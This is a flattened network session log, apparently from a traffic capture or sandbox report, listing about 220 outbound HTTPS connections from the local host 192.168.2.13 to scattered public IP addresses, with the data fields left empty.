                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11947192.168.2.133829414.227.46.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11948192.168.2.135070846.108.8.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11949192.168.2.1347466129.80.16.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11950192.168.2.1340110174.160.126.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11951192.168.2.1354390119.176.52.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11952192.168.2.1356722179.11.128.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11953192.168.2.1349034134.111.249.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11954192.168.2.133936418.100.120.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11955192.168.2.1346426112.29.152.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11956192.168.2.1335898204.233.197.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11957192.168.2.1346864213.31.146.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11958192.168.2.1348926217.184.89.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11959192.168.2.134323241.191.94.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11960192.168.2.134884059.253.244.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11961192.168.2.1353284160.17.7.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11962192.168.2.135893262.3.214.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11963192.168.2.1339678138.67.148.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11964192.168.2.1334406217.87.202.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11965192.168.2.1352730220.243.199.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11966192.168.2.1359096130.109.200.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11967192.168.2.1344530167.127.183.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11968192.168.2.1358342130.224.155.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11969192.168.2.1338826103.148.65.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11970192.168.2.1344116121.153.140.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11971192.168.2.1339936190.146.241.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11972192.168.2.13355001.130.159.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11973192.168.2.1358550146.215.234.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11974192.168.2.133652292.180.181.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11975192.168.2.134140231.1.245.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11976192.168.2.1334646154.230.224.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11977192.168.2.134565040.74.235.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11978192.168.2.1333130132.253.8.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11979192.168.2.134257418.50.167.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11980192.168.2.13434448.254.81.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11981192.168.2.1347330107.39.114.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11982192.168.2.1338178156.49.74.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11983192.168.2.133462489.122.21.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11984192.168.2.135362862.179.228.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11985192.168.2.1336376109.221.159.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11986192.168.2.1348716207.218.191.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11987192.168.2.1339216123.7.27.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11988192.168.2.1342888168.12.202.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11989192.168.2.1353804151.0.120.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11990192.168.2.1350658153.190.247.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11991192.168.2.135592468.82.208.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11992192.168.2.13519804.150.112.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11993192.168.2.1340056184.218.52.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11994192.168.2.1358554193.121.178.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11995192.168.2.134908073.214.246.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11996192.168.2.13481102.125.218.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11997192.168.2.134747847.56.20.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11998192.168.2.1348962182.153.54.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11999192.168.2.135056025.223.68.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12000192.168.2.1356950165.141.239.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12001192.168.2.1337128174.193.111.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12002192.168.2.1343616172.40.130.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12003192.168.2.1355542173.112.219.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12004192.168.2.135650077.77.114.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12005192.168.2.1355240218.0.232.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12006192.168.2.1338476140.253.87.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12007192.168.2.134720645.6.222.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12008192.168.2.1335396137.251.203.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12009192.168.2.134057812.57.127.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12010192.168.2.1359334200.119.32.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12011192.168.2.1347670130.220.64.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12012192.168.2.134540241.56.2.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12013192.168.2.1360572120.223.67.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12014192.168.2.136001679.170.6.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12015192.168.2.133634469.209.18.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12016192.168.2.135682071.194.178.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12017192.168.2.1351980182.157.118.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12018192.168.2.1334194104.44.83.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12019192.168.2.1351846208.134.151.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12020192.168.2.134011660.130.122.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12021192.168.2.1334638176.100.23.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12022192.168.2.134620275.77.250.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12023192.168.2.134061864.109.199.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12024192.168.2.1355050211.26.21.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12025192.168.2.1341834144.189.124.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12026192.168.2.135639013.137.26.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12027192.168.2.1340228108.138.199.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12028192.168.2.1359528216.0.106.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12029192.168.2.1352810199.231.234.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12030192.168.2.134442467.140.171.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12031192.168.2.133318450.13.36.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12032192.168.2.135862282.161.242.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12033192.168.2.1360296175.147.169.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12034192.168.2.133696019.27.94.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12035192.168.2.1357324207.184.212.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12036192.168.2.133867217.202.7.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12037192.168.2.134430052.15.235.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12038192.168.2.1343214104.2.118.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12039192.168.2.133860660.226.83.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12040192.168.2.133598885.250.252.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12041192.168.2.134898464.68.237.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12042192.168.2.135791497.198.95.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12043192.168.2.1353006143.94.177.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12044192.168.2.1334370198.199.131.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12045192.168.2.134198039.85.32.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12046192.168.2.135712890.135.61.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12047192.168.2.133997441.239.63.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12048192.168.2.135045812.149.100.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12049192.168.2.1338362153.157.220.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12050192.168.2.1350020171.89.197.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12051192.168.2.135560488.53.205.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12052192.168.2.1355362163.90.221.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12053192.168.2.134605699.53.179.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12054192.168.2.1346180121.20.231.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12055192.168.2.1352502134.211.203.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12056192.168.2.1341046129.159.5.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12057192.168.2.135843877.176.43.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12058192.168.2.1357012197.155.148.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12059192.168.2.133617444.109.32.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12060192.168.2.1343614208.84.63.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12061192.168.2.1360076138.138.110.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12062192.168.2.13529565.251.17.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12063192.168.2.13447369.7.161.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12064192.168.2.1351220106.67.79.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12065192.168.2.1356906170.78.3.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12066192.168.2.1333094171.242.229.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12067192.168.2.1357438181.214.164.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12068192.168.2.1358502211.172.176.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12069192.168.2.135532031.57.69.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12070192.168.2.1332928136.3.98.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12071192.168.2.135718894.210.168.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12072192.168.2.1352058175.28.32.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12073192.168.2.133455851.61.89.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12074192.168.2.135273274.15.250.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12075192.168.2.1344438174.8.165.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12076192.168.2.1354574103.103.127.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12077192.168.2.1341534180.101.128.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12078192.168.2.1346310175.76.12.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12079192.168.2.135549038.52.34.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12080192.168.2.1346890161.195.55.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12081192.168.2.1345526223.127.88.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12082192.168.2.1337752183.70.242.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12083192.168.2.134044827.128.68.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12084192.168.2.1341104212.206.95.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12085192.168.2.1343854213.42.58.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12086192.168.2.1339852163.66.71.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12087192.168.2.135852239.2.115.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12088192.168.2.135861027.117.11.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12089192.168.2.136038294.212.86.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12090192.168.2.1354582165.95.51.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12091192.168.2.134841842.90.89.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12092192.168.2.134093892.212.41.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12093192.168.2.1357354179.133.184.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12094192.168.2.1341162109.241.87.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12095192.168.2.1358596196.15.170.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12096192.168.2.135988854.87.158.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12097192.168.2.1349162167.249.247.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12098192.168.2.1359946130.186.176.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12099192.168.2.1341354190.127.22.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12100192.168.2.135478050.223.158.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12101192.168.2.134547677.164.41.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12102192.168.2.134512877.103.242.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12103192.168.2.134548460.247.128.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12104192.168.2.135747491.224.18.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12105192.168.2.1346922141.52.145.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12106192.168.2.1338988188.201.56.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12107192.168.2.1359752156.162.90.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12108192.168.2.1337724152.7.68.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12109192.168.2.1342636133.62.40.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12110192.168.2.1356378172.246.33.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12111192.168.2.1360048137.43.71.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12112192.168.2.1340356134.104.84.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12113192.168.2.133974838.4.105.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12114192.168.2.1333070149.158.41.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12115192.168.2.134657864.150.9.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12116192.168.2.135230297.188.189.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12117192.168.2.1350252180.198.37.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12118192.168.2.135225683.41.138.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12119192.168.2.135254087.10.96.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12120192.168.2.1359094188.124.160.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12121192.168.2.1352004113.23.191.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12122192.168.2.135833824.88.117.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12123192.168.2.133849035.121.147.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12124192.168.2.133938424.230.80.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12125192.168.2.133570878.45.76.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12126192.168.2.133399860.147.224.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12127192.168.2.133883032.103.18.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12128192.168.2.1337640217.112.33.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12129192.168.2.135649217.193.46.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12130192.168.2.1339390187.186.39.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12131192.168.2.133635035.203.146.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12132192.168.2.1336020162.142.32.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12133192.168.2.135129813.14.124.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12134192.168.2.1333934161.166.95.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12135192.168.2.134187040.112.87.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12136192.168.2.1360774113.12.23.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12137192.168.2.134117890.250.195.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12138192.168.2.135285019.223.57.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12139192.168.2.133316241.33.43.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12140192.168.2.1336836200.198.237.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12141192.168.2.13524464.216.100.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12142192.168.2.133614666.105.124.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12143192.168.2.135166240.158.212.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12144192.168.2.1342802145.105.250.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12145192.168.2.1354076177.196.241.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12146192.168.2.1351684149.2.185.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12147192.168.2.1355914151.218.1.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12148192.168.2.133736632.248.26.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12149192.168.2.1335938103.99.170.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12150192.168.2.134873686.149.16.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12151192.168.2.133914694.153.217.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12152192.168.2.1343508101.123.247.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12153192.168.2.134952250.153.138.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12154192.168.2.1354330166.219.37.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12155192.168.2.1333146175.184.177.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12156192.168.2.133744439.38.98.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12157192.168.2.133870659.18.139.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12158192.168.2.1353492182.146.85.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12159192.168.2.133618453.160.132.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12160192.168.2.1357282151.230.237.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12161192.168.2.1354146119.165.196.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12162192.168.2.1345918174.197.73.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12163192.168.2.136041283.137.156.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12164192.168.2.1336906150.131.33.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12165192.168.2.1353336112.27.202.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12166192.168.2.133888038.130.251.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12167192.168.2.135735831.152.208.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12168192.168.2.1355366172.239.201.232443
                                        TimestampBytes transferredDirectionData


